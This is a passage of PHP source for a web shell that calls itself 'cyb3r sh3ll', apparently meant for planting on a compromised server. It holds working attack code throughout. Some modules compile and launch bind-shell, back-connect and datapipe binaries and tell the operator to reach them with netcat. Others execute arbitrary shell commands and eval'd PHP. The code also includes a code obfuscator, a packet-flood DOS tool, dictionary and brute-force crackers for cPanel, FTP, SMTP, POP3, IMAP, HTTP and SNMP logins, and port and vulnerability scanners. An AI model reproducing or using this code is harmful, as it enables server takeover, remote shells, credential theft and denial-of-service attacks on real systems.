";} + + elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";} + + else + + { + + fwrite($fp,$data,strlen($data)); + + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + + $v[1] = str_replace("%port",$bind["port"],$v[1]); + + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + + $v[1] = str_replace("//","/",$v[1]); + + $retbind = myshellexec($v[1]." > /dev/null &"); + + sleep(5); + + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
View binder's process
";} + + } + + echo "
"; + + } + + } + + if (!empty($bcsubmit)) + + { + + echo "Result of back connection:
"; + + $v = $bcsrcs[$bc["src"]]; + + if (empty($v)) {echo "Unknown file!
";} + + else + + { + + $w = explode(".",$bc["src"]); + + $ext = $w[count($w)-1]; + + unset($w[count($w)-1]); + + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + + $binpath = $tmpdir.join(".",$w).rand(0,999); + + if ($ext == "pl") {$binpath = $srcpath;} + + @unlink($srcpath); + + $fp = fopen($srcpath,"ab+"); + + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
";} + + elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";} + + else + + { + + fwrite($fp,$data,strlen($data)); + + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + + $v[1] = str_replace("%host",$bc["host"],$v[1]); + + $v[1] = str_replace("%port",$bc["port"],$v[1]); + + $v[1] = str_replace("//","/",$v[1]); + + $retbind = myshellexec($v[1]." > /dev/null &"); + + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
"; + + } + + } + + } + + if (!empty($dpsubmit)) + + { + + echo "Result of datapipe-running:
"; + + $v = $dpsrcs[$datapipe["src"]]; + + if (empty($v)) {echo "Unknown file!
";} + + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
";} + + else + + { + + $srcpath = $tmpdir.$datapipe["src"]; + + $w = explode(".",$datapipe["src"]); + + $ext = $w[count($w)-1]; + + unset($w[count($w)-1]); + + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + + $binpath = $tmpdir.join(".",$w).rand(0,999); + + if ($ext == "pl") {$binpath = $srcpath;} + + @unlink($srcpath); + + $fp = fopen($srcpath,"ab+"); + + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
";} + + elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";} + + else + + { + + fwrite($fp,$data,strlen($data)); + + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + + $v[1] = str_replace("%path",$binpath,$v[1]); + + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + + $v[1] = str_replace("//","/",$v[1]); + + $retbind = myshellexec($v[1]." > /dev/null &"); + + sleep(5); + + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
View datapipe process
";} + + } + + echo "
"; + + } + + } + + ?>Binding port:
Port: "> Password: ">  
+ +Back connection:
HOST: "> Port: ">  
+ +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

+ +Datapipe:
+
+HOST: "> Local port: ">  
Note: sources will be downloaded from remote server. + + + + +
+

[: Enter Command to Execute: :] + +

 


+
Useful Commands
+ + +
+ +
+ + + + + + + + + +   + + + +
+ + Warning. Kernel may be alerted using higher levels
+ +
+ +
+
Result of execution this command
:
"; + + $olddir = realpath("."); + + @chdir($d); + + $ret = myshellexec($cmd); + + $ret = convert_cyr_string($ret,"d","w"); + + if ($cmd_txt) + + { + + $rows = count(explode("\r\n",$ret))+1; + + if ($rows < 10) {$rows = 10;} + + echo "
"; + + } + + else {echo $ret."
";} + + @chdir($olddir); + + } + + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + + echo "


 Display in text-area 
"; + +} + +} + +if ($act == "phpcode") +{ + echo " +
+PHP Code Evaluate -|- +Mass Code Injector -|- +PHP Obfuscator -|- +Web Server Fuzzer +

"; +} + +if ($act == "eval") + +{ + + if (!empty($eval)) + + { + + echo "Result of execution this PHP-code:
"; + + $tmp = ob_get_contents(); + + $olddir = realpath("."); + + @chdir($d); + + if ($tmp) + + { + + ob_clean(); + + eval($eval); + + $ret = ob_get_contents(); + + $ret = convert_cyr_string($ret,"d","w"); + + ob_clean(); + + echo $tmp; + + if ($eval_txt) + + { + + $rows = count(explode("\r\n",$ret))+1; + + if ($rows < 10) {$rows = 10;} + + echo "
"; + + } + + else {echo $ret."
";} + + } + + else + + { + + if ($eval_txt) + + { + + echo "
"; + + } + + else {echo $ret;} + + } + + @chdir($olddir); + + } + + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + + echo "


 Display in text-area 
"; + +} + +if ($act == "proxy") +{ +global $errorbox,$et,$footer,$hcwd; +echo "
Navigator: $hcwd
"; +if (!empty($_REQUEST['urL'])){ +$dir=""; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); +$url=@fsockopen($host, 80, $errno, $errstr, 12); +if(!$url)die("
$errorbox Can not connect to host!$et$footer"); +fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +while(!feof($url)){ +$con = fgets($url); +$con = str_replace("href=mailto","HrEf=mailto",$con); +$con = str_replace("HREF=mailto","HrEf=mailto",$con); +$con = str_replace("href=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +echo $con; +} +fclose($url); +} +} + + +if ($act == "obfuscate") +{ + if ( isset($_POST['code']) && + $_POST['code'] != '') + { + $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),''),9)); // high Compression! :P + $encode = ' + +'; + } + else + { + $encode = 'Please Enter your Code! and Click Submit! :)'; + }?> +
+
+ +
+

$data

"; + + print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message
"; + for($i=0;$i<$times;$i++) + { + $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout); + if($socket) + { + fwrite($socket , $data , $length ); + fclose($socket); + } + } + echo ""; + echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."
"; + echo "Total Number of Packets Sent : " . $times . "
"; + echo "Total Data Sent = ". showsizE($times*$length) . "
"; + echo "Data per packet = " . showsizE($length) . "
"; + } + else + { + ?> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ IP + + +
+ Port + + +
+ Timeout + + +
+ No of times + + +
+ Message (The message Should be long and it will be multiplied with the value after it) + + + + x + + +
+ +
+
+ +
+ +
+ + + + + +
+

+ IP servers : +

+ + +
User ListPassword List
+ +
+ Guess options +   + Cpanel (2082) + + Telnet(23) +
+ Timeout Delay +
+ Bruteforce +
+ Min Bruteforce Length: +
+ Max Bruteforce Length: + +

+

+
+
+ +"; + cpanel_check($target,$pureuser,$firstVal,$connect_timeout); + + while (1) { + for ($i = 0; $i < ($max + 1); $i++) { + if ($A[$i] == -1) { + break; + } + } + $i--; + $incDone = 0; + while (!$incDone) { + for ($j = 0; $j < $numVals; $j++) { + if ($A[$i] == $vals[$j]) { + break; + } + } + if ($j == ($numVals - 1)) { + $A[$i] = $vals[0]; + $i--; + if ($i < 0) { + for ($i = 0; $i < ($max + 1); $i++) { + if ($A[$i] == -1) { + break; + } + } + $A[$i] = $vals[0]; + $A[$i + 1] = -1; + $incDone = 1; + print "Starting " . (strlen($currentVal) + 1) . " Characters Cracking
"; + } + } else { + $A[$i] = $vals[$j + 1]; + $incDone = 1; + } + } + $i = 0; + $currentVal = ""; + while ($A[$i] != -1) { + $currentVal = $currentVal . $A[$i]; + $i++; + } + cpanel_check($target,$pureuser,$currentVal,$connect_timeout); + //echo $currentVal . "
"; + if ($currentVal == $realMax) { + return 0; + } + } +} +function getmicrotimev() { + list($usec, $sec) = explode(" ",microtime()); + return ((float)$usec + (float)$sec); +} + +function ftp_check($host,$user,$pass,$timeout) +{ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "ftp://$host"); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print " + Error : Connection Timeout + Please Check The Target Hostname .

";exit; + } + else if ( curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" + and Password \"$pass\"

"; + } + curl_close($ch); +} +function cpanel_check($host,$user,$pass,$timeout) +{ + global $cpanel_port; + $ch = curl_init(); + //echo "http://$host:".$cpanel_port." $user $pass
"; + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print " + Error : Connection Timeout + Please Check The Target Hostname .

";exit; + } + else if ( curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" + and Password \"$pass\"

"; + } + curl_close($ch); +} + +$time_start = getmicrotime(); + +if(isset($submit) && !empty($submit)) +{ + if(empty($users) && empty($pass) ) + { + print "

Error : Please Check The Users or Password List Entry . . .

"; exit; } + if(empty($users)){ print "

Error : Please Check The Users List Entry . . .

"; exit; } + if(empty($pass) && $_REQUEST['bruteforce']!="true" ){ print "

Error : Please Check The Password List Entry . . .

"; exit; }; + $userlist=explode("\n",$users); + $passlist=explode("\n",$pass); + print "[~]# + LETS GAME BEGIN ;) ...

"; + + if(isset($_POST['connect_timeout'])) + { + $connect_timeout=$_POST['connect_timeout']; + } + + if($cracktype == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($target,$pureuser,$purepass,$connect_timeout); + } + } + } + + if ($cracktype == "cpanel" || $cracktype == "cpanel2") + { + if($cracktype == "cpanel2") + { + $cpanel_port="23"; + } + else + $cpanel_port="2082"; + + foreach ($userlist as $user) + { + $pureuser = trim($user); + print "[~]# + Please put some good password to crack user $pureuser :( ... "; + if($_POST['bruteforce']=="true") + { + echo " bruteforcing .."; + echo "
"; + brute(); + } + else + { + echo "
"; + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($target,$pureuser,$purepass,$connect_timeout); + } + } + } + $time_end = getmicrotime(); +$time = $time_end - $time_start; + print "[~]# + Cracking Finished. Elapsed time: $time seconds

"; + } +} + + + +?> + + + + + + + + +
+ +

+ + + + + + + +
+
+ + +
+ 		+
+ + +
+ 		+
+ + +
+

+
+ "; +} +} + +} +closedir($dh); +} +} +?> + + +
+ +Cracking " . htmlspecialchars($hash)."...
";flusheR(); +$type=($_REQUEST['type']=='MD5')?'md5':'sha1'; +while(!feof($dictionary)){ +$word=trim(fgets($dictionary)," \n\r"); +if ($hash==strtoupper(($type($word)))){echo "The answer is $word
";break;} +} +echo "Done!"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +echo "
Hash cracker:
Dictionary:
Hash:
Type:
$hcwd
"; +echo $eval_php_code; +} + +if ($act == "smtp") +{ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$smtp=smtplogiN($target,$user,$pass,5); +if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($smtp){echo "U: $user P: $pass
";if(!$type)break;}} +flusheR(); +} +echo "
Done"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else +{ +echo "
SMTP cracker:$crack"; +} + +echo "
SMTP cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
"; + + +} + +if ($act == "pop3") +{ + +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$pop3=pop3logiN($target,$user,$pass); +if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ +if ($pop3){echo "U: $user P: $pass
";if(!$type)break;}} +flusheR(); +} +echo "
Done"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else +{ echo "
POP3 cracker:$crack
"; +} +echo "
POP3 cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
"; + +} +if ($act == "ftp") +{ +global $errorbox,$t,$et,$crack; +if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} +if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass
";if(!$type)break;} +ftp_close($ftp); +flusheR(); +} +echo "
Done"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else +{ +echo "
FTP cracker:$crack
"; +} +echo "
FTP cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
"; + +} +} + +if ($act == "imap") +{ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$imap=imaplogiN($target,$user,$pass); +if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ +if ($imap){echo "U: $user P: $pass
";if(!$type)break;}} +flusheR(); +} +echo "
Done"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +}else +{ +echo "
IMAP cracker:$crack
"; +} +print ('
IMAP cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
'); + +} + +if ($act == "dic") +{ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; +if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min = $_REQUEST['min']; +$max = $_REQUEST['max']; +if($max<$min)die($errorbox ."Bad input!$et". $footer); +$s =$w=""; +$out = $_REQUEST['output']; +$r = ($_REQUEST['range']=='a' )?'a':'A'; +if ($_REQUEST['range']==0) $r=0; +for($i=0;$i<$min;$i++) $s.=$r; +$dic = fopen($out,'a'); +if(is_nan($r)){ +while(strlen($s)<=$max){ +$w = $s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +else{ +while(strlen($w)<=$max){ +$w =(string)str_repeat("0",($min - strlen($s))).$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +fclose($dic); +echo "Done"; +} +if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if (!$input){ +if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et
"; +else{ +$input=explode("\n",shelL("cat $input")); +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +foreach ($input as $in){ +$user = $in; +$user = trim(fgets($in)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "Done"; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +while (!feof($input)){ +$user = trim(fgets($input)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "Done"; +} +else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et
"; +} +}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach ($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo "Done"; +}else{ +$temp=whereistmP(); +echo "
+ + +
+Wordlist generator: + + + + + + + + + + +
Range: + +
Min lenght: + +
Max lenght: + +
Output:
Combo style output
$hcwd
+		 +Grab dictionary: + + + + + + + + +
Grab from:
Output:
Combo style output
$hcwd
+		 +Download dictionary: + + + +
URL:
Output:
Combo style output
$hcwd
+
+
";} +} + +if ($act == "htmlform") +{ +global $errorbox,$footer,$et,$hcwd; +if(!empty($_REQUEST['start'])){ +$url=$_REQUEST['target']; +$uf=$_REQUEST['userf']; +$pf=$_REQUEST['passf']; +$sf=$_REQUEST['submitf']; +$sv=$_REQUEST['submitv']; +$method=$_REQUEST['method']; +$fail=$_REQUEST['fail']; +$dic=$_REQUEST['dictionary']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); +$dictionary=fopen($dic,'r'); +echo "Cracking started...
"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$url.="?$uf=$user&$pf=$pass&$sf=$sv"; +$res=check_urL($url,$method,$fail,12); +if (!$res){echo "U: $user P: $pass
";flusheR();if(!$type)break;} +flusheR(); +} +fclose($dictionary); +echo "Done!
"; +} +else echo "
HTTP Form cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:$hcwd
Action Page:
Method:
Username field name:
Password field name:
Submit name:
Submit value:
Fail string:
"; +} + +if ($act == "basicauth") +{ +global $errorbox,$et,$t,$crack,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if($method='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo ""; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20')echo "U: $user P: $pass
"; +flusheR(); +} +} +echo "Done!"; +}else echo "
+HTTP Auth cracker:
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
$hcwd
"; +} + +if ($act == "snmp") +{ +global $t,$et,$errorbox,$crack,$hcwd; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
";flusheR(); +while(!feof($dictionary)){ +$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res)echo "$com
"; +flusheR(); +} +echo "
Done"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} + echo "
SNMP cracker:$hcwd
Dictionary:
Server:
"; +} + + + +if ($act == "scanner") +{ +global $hcwd; +if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; +$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; +if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ +$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; +echo "Port scanning started against ".htmlspecialchars($target).":
"; +$start=time(); +for($i=$from;$i<=$to;$i++){ +if($tcp){ +if (checkthisporT($target,$i,$timeout)){ +$nu++; +$ser=""; +if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; +echo "$nu) $i $ser (Connect) [TCP]
"; +} +} +if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]
";} +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)"; +} +elseif (!empty($_REQUEST['securityscanner'])){ +echo ""; +$start=time(); +$from=$_REQUEST['from']; +$to=(int)$_REQUEST['to']; +$timeout=(int)$_REQUEST['timeout']; +$f = substr($from,strrpos($from,".")+1); +$from = substr($from,0,strrpos($from,".")); +if(!empty($_REQUEST['httpscanner'])){ +echo "Loading webserver bug list..."; +flusheR(); +$buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); +$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); +if($dl){$file=file($buglist);echo "Done! scanning started.

";}else echo "Failed!!! scanning started without webserver security testing...

"; +flusheR(); +}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:

";} +for($i=$f;$i<=$to;$i++){ +$output=0; +$ip="$from.$i"; +if(!empty($_REQUEST['nslookup'])){ +$hn=gethostbyaddr($ip); +if($hn!=$ip)echo "$ip [$hn]
";} +flusheR(); +if(!empty($_REQUEST['ipscanner'])){ +$port=$_REQUEST['port']; +if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; +$open=$ser=""; +foreach($p as $po){ +$scan=checkthisporT($ip,$po,$timeout); +if ($scan){ +$ser=""; +if($ser=getservbyport($po,"tcp"))$ser="($ser)"; +$open.=" $po$ser "; +} +} +if($open){echo "$ip) Open ports:$open
";$output=1;} +flusheR(); +} +if(!empty($_REQUEST['httpbanner'])){ +$res=get_sw_namE($ip,$timeout); +if($res){ +echo "$ip) Webserver software: "; +if($res==-1)echo "Unknow"; +else echo $res; +echo "
"; +$output=1; +} +flusheR(); +} +if(!empty($_REQUEST['httpscanner'])){ +if(checkthisporT($ip,80,$timeout) && !empty($file)){ +$admin=array('/admin/','/adm/'); +$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); +$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); +$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); +foreach ($file as $v){ +$vuln=array(); +$v=trim($v); +if(!$v || $v{0}=='#')continue; +$v=str_replace('","','^',$v); +$v=str_replace('"','',$v); +$vuln=explode('^',$v); +$page=$cqich=$nukech=$adminch=$userch=$vuln[1]; +if(strstr($page,'@CGIDIRS')) +foreach($cgi as $cg){ +$cqich=str_replace('@CGIDIRS',$cg,$page); +$url="http://$ip$cqich"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} +flusheR(); +} +elseif(strstr($page,'@ADMINDIRS')) +foreach ($admin as $cg){ +$adminch=str_replace('@ADMINDIRS',$cg,$page); +$url="http://$ip$adminch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} +flusheR(); +} +elseif(strstr($page,'@USERS')) +foreach ($users as $cg){ +$userch=str_replace('@USERS',$cg,$page); +$url="http://$ip$userch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
